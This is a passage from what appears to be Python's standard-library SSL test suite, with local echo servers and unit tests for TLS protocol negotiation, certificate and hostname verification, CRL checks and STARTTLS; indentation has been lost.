self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds;
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
if not has_tls_protocol(protocol):
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has a different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 performs the client cert exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
